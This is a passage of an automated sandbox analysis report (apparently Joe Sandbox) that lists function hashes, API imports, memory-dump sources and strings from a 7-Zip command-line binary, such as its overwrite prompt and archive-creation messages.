                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$Find$CloseFirstStream
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4071060300-0
                                                                                                                                                                                                                                • Opcode ID: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                                                                                                                • Instruction ID: 1d783019c4cc91a4a74b31aad80c8f8781aeb058b33740577f843a5d7b15eb36
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8121A132218B4196DA249B25E8543AD6360FB9A774F545323DEBA437E4EF3DCA49C301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 00217DA9
                                                                                                                                                                                                                                • free.MSVCRT ref: 00217DB2
                                                                                                                                                                                                                                • free.MSVCRT ref: 00217DE5
                                                                                                                                                                                                                                • free.MSVCRT ref: 00217DF2
                                                                                                                                                                                                                                • free.MSVCRT ref: 00217DFB
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94DB
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94E3
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F94F0
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F951C
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F9525
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F952D
                                                                                                                                                                                                                                  • Part of subcall function 001F94A8: free.MSVCRT ref: 001F953A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: l}!
                                                                                                                                                                                                                                • API String ID: 1294909896-1752497331
                                                                                                                                                                                                                                • Opcode ID: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                                                                                                                • Instruction ID: 6e572eb62140c6f4f2f9851306e6de1ec22dcc6ca1cfd27784cca31adec0c6d7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E018F2371694489CA15AF25EC513AC2334EBB9FA4F184222EF1D0B315EF30C892C390
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 0021CD2A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputsfree
                                                                                                                                                                                                                                • String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
                                                                                                                                                                                                                                • API String ID: 2581285248-171671738
                                                                                                                                                                                                                                • Opcode ID: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                                                                                                                • Instruction ID: a226c07362ec06c213711348a30fcdc594fe1b4bc77673cb78aad973d584b1f2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2331E72A2A864587DB348F14E4953E927A1E3B43A4F680123EF5E073A9CB6CCDF1D701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
                                                                                                                                                                                                                                • Instruction ID: 24edbf3f7092803fffc982ccfc69875842a9b6c7f6bb8e81a087f84be9b4ae43
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F218463215940A1CA20EF24E85119EA731EBE27E0F545223FF6E877A9DF39C646C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$fputc
                                                                                                                                                                                                                                • String ID: Time =
                                                                                                                                                                                                                                • API String ID: 1185151155-458291097
                                                                                                                                                                                                                                • Opcode ID: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                                                                                                                                                                                                                • Instruction ID: 0c3ae9a425372543429bd4454747fafbb547630bd37d2d79c3cb402f3a4352f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 125f46871291328263d9a45044a61c5585df70acc1ace0c9469d427cba69f483
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6521B765350A1185EB08AF1BED583995362B7A8FC4F48F036DD2E17768DD3CC896C340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSectionfreememmove$EnterExceptionLeaveThrow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 202075352-0
                                                                                                                                                                                                                                • Opcode ID: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                                                • Instruction ID: c363ae9a29afadea17cee6d12128799d2d215be29df0f2f396986db0cd124c84
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE21C17323075486CB60EF26D9456AC7320F345BE5FA05326EE3917AA9DF35C896CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                                                • Instruction ID: 07223e4a58da6cfe4f3c088bafaec1e49a826bae4f33254133ca658f50f4c7e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B311FA2320298485CA11AF35D8516692321EBA6FA8F1D8272EF7D577A9CF34D847C324
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                                                • Instruction ID: 3f53efcb07785f03181760bbf2e1e5dd716fca1d434d3976357421f009ca1d50
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C015E23B01984898B25FE26D9512686331ABB5FA4B2D4266EF3D1B759DF30D8428350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                                                • Instruction ID: b4dd4d238d66451906139a56c986d57692fc7a470e803311b2a5e9d79b23f47a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5111223752A4085CB20AF35D85166D2324EBA6FA4F1D8272DF6D5B795CF30D856C350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00216B7C
                                                                                                                                                                                                                                  • Part of subcall function 001D6618: FormatMessageW.KERNEL32 ref: 001D6676
                                                                                                                                                                                                                                  • Part of subcall function 001D6618: LocalFree.KERNEL32 ref: 001D6698
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
                                                                                                                                                                                                                                  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
                                                                                                                                                                                                                                • free.MSVCRT ref: 00216BAE
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00216BCC
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputsfree$FormatFreeLocalMessagefputc
                                                                                                                                                                                                                                • String ID: : $----------------
                                                                                                                                                                                                                                • API String ID: 1215563195-4071417161
                                                                                                                                                                                                                                • Opcode ID: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
                                                                                                                                                                                                                                • Instruction ID: 501048cb1da7e4190590ecc1dfcf0b1fa45d34863972ccb5d08e54adaad180e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a844113c29b51b67a554de1085d4dbdaa26cfeae81c93ca6df2fe7833a2ff0cb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F01657270194595DA10EF26E98476E7321F7A9BE4F148226EE7E07794CF3CD546C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                                                • Instruction ID: a8a5ee5a1c47ac26b33518d85f486019c4431562c278910769c721d84fc31a61
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99F0C923B1185489CA15BF26DD915AC2730ABB6FE571D8162EF3D5B359CF30D89283A0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021BCD4
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021BD17
                                                                                                                                                                                                                                  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
                                                                                                                                                                                                                                • free.MSVCRT ref: 0021BD2B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputsfree$fputc
                                                                                                                                                                                                                                • String ID: : $Write SFX:
                                                                                                                                                                                                                                • API String ID: 3584323934-2530961540
                                                                                                                                                                                                                                • Opcode ID: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
                                                                                                                                                                                                                                • Instruction ID: cf63684ac3cfd274d62e3fe7013a7e614e8d791df32869aae9dbe4c7e29ffc39
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0858727a3d2188373386701502e4491ffbda9cac782742d358bcdb59749fd626
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 090125A231094050DA209F25E95439A5321F7A8FF4F489232AE3E477A9DF28C586C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021BB49
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021BB76
                                                                                                                                                                                                                                  • Part of subcall function 001D2568: free.MSVCRT ref: 001D25B5
                                                                                                                                                                                                                                  • Part of subcall function 001D2568: free.MSVCRT ref: 001D25C0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputsfree
                                                                                                                                                                                                                                • String ID: Creating archive: $StdOut$Updating archive:
                                                                                                                                                                                                                                • API String ID: 2581285248-1319951512
                                                                                                                                                                                                                                • Opcode ID: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
                                                                                                                                                                                                                                • Instruction ID: 6031657f402b104988b925e4fd8fd1e7bc00005ebae6a60c1023953106438eb5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEF062A5315A8591DE05DF26EA983AC6371BB68FD4F48D432CD1E0B718DF2CC499C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                                                                                                                • Instruction ID: 21b862151eaf05396f6c9e9001bd281a3c238636aa937872c35a7fd443b6d425
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDE0C22261040481DB14AF76DCA21282334ABB5F8871890A3DB3E8B325CE30E85283A4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                                                                                                                • Instruction ID: b156e25b553986cd9cc526d4d3a51f32f90505c656d2432a687d35a3243501ee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD814673305AC486CB10EF2AD8842AD77A1F795F98F494122DE6D0BB69CF39C886C351
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Q
                                                                                                                                                                                                                                • API String ID: 0-3463352047
                                                                                                                                                                                                                                • Opcode ID: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
                                                                                                                                                                                                                                • Instruction ID: c007c01a8b86c8ac2c882ef4332991b99d465072556fd525f3af781cb06b4eaa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 708d1e99ea4dbab6444f2f0d64f520fcdf94141e7dceb2e288505dbe970de39d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82618272318A8482CB20DF25E48067EB7A1F7D4B94F559212EB9B57768DF78C845CB01
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
